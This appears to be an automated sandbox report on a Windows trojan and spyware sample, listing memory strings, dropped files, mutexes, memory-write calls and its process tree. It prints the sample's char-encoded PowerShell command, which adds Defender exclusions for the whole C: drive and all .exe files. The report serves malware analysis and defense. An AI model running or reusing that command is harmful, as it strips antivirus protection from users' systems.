                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 0000000C.00000002.1524852766.00003D3C00C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                      Source: chrome.exe, 0000000C.00000002.1529061146.00003D3C01474000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: chrome.exe, 0000000C.00000002.1507872503.0000021F24397000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                      Source: chrome.exe, 0000000C.00000003.1423946714.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1424062885.00003D3C004B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394323838.00003D3C014F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://passwords.google.comSaved
                      Source: chrome.exe, 0000000C.00000002.1522099250.00003D3C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1508044068.0000021F24437000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 0000000C.00000002.1524852766.00003D3C00C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 0000000C.00000002.1518860266.00003D3C001D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 0000000C.00000002.1518860266.00003D3C001D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524430069.00003D3C00B84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chrome/answer/96817
                      Source: chrome.exe, 0000000C.00000002.1520721013.00003D3C00528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1526280757.00003D3C00F1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 0000000C.00000002.1526280757.00003D3C00F1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/Terms
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518749749.00003D3C001B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v10
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=searchTerms
                      Source: chrome.exe, 0000000C.00000002.1527662934.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                      Source: chrome.exe, 0000000C.00000003.1394678544.00003D3C01554000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-GB&async=fixed:0
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                      Source: chrome.exe, 0000000C.00000002.1522099250.00003D3C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524430069.00003D3C00B84000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                      Source: chrome.exe, 0000000C.00000002.1507872503.0000021F24397000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
                      Source: chrome.exe, 0000000C.00000003.1395454433.00003D3C00464000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521442004.00003D3C00750000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1520721013.00003D3C00528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.icoe
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en-GB&amp;tab=ri&amp;ogbl
                      Source: chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-GB/about/products?tab=rh
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: chrome.exe, 0000000C.00000002.1519452454.00003D3C00334000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: chrome.exe, 0000000C.00000002.1527314161.00003D3C01160000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: chrome.exe, 0000000C.00000002.1533903414.00003D3C01E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 0000000C.00000002.1534385770.00003D3C01EF0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534115636.00003D3C01EA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529590373.00003D3C016A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1533851715.00003D3C01E40000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1533903414.00003D3C01E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518621958.00003D3C00170000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1532933991.00003D3C01B58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1526370838.00003D3C00F54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                      Source: chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlb
Source: unknown | HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\a.exe | Window created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_07310998 CreateDesktopW

                      System Summary

Source: a.exe.0.dr, eZqE4dDZtWpFVNxvud.cs | Large array initialization: EM50SpcLt: array initializer size 360944
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe | File dump: license.exe.16.dr 280297185
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe | File dump: hosts.exe.17.dr 290654544
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_07316460 NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_073163A8 NtWow64WriteVirtualMemory64
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_07317200 NtWow64QueryInformationProcess64
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_07317E29 NtWow64WriteVirtualMemory64
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_073171F8 NtWow64QueryInformationProcess64
Source: C:\Users\user\AppData\Roaming\a.exe | Code function: 11_2_07318860 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe | Code function: 16_2_06019118 NtResumeThread
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe | Code function: 16_2_06019110 NtResumeThread
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\a.exe 2678FF9E7DE004631E19523D40153B6C04C7A88732CA15E283B0F970ADCB18EF
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1331006833.000000000149E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141884171.0000000000F56000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAml.exe4 vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003336000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileName vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000353D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAml.exe4 vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.000000000353D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: r,\\StringFileInfo\\000004B0\\OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Management.Automation.dllv+ vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003221000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: r,\\StringFileInfo\\000004B0\\OriginalFilename vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000002.1333948900.0000000003620000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameHklqepwe.exe" vs SecuriteInfo.com.FileRepMalware.23820.12149.exe
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: a.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@45/18@13/9
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | File created: C:\Users\user\AppData\Roaming\a.exe
Source: C:\Users\user\AppData\Roaming\hosts.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe | Mutant created: \Sessions\1\BaseNamedObjects\f7de704b9889b0df737152
Source: C:\Users\user\AppData\Roaming\a.exe | Mutant created: \Sessions\1\BaseNamedObjects\84494b6758e480d9
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe | Mutant created: \Sessions\1\BaseNamedObjects\15e3cb7667a15b0c6fe65713f09036f8
Source: C:\Users\user\AppData\Local\Temp\Gelelx.exe | Mutant created: \Sessions\1\BaseNamedObjects\kdbaf
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1l2zyuj.o2o.ps1
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\AppData\Roaming\a.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\a.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\a.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: chrome.exe, 0000000C.00000002.1508785015.0000021F24680000.00000002.00000001.00040000.0000001B.sdmp | Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: chrome.exe, 0000000C.00000002.1507739912.0000021F242E5000.00000002.00000001.00040000.00000018.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.FileRepMalware.23820.12149.exe | Virustotal: Detection: 16%
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
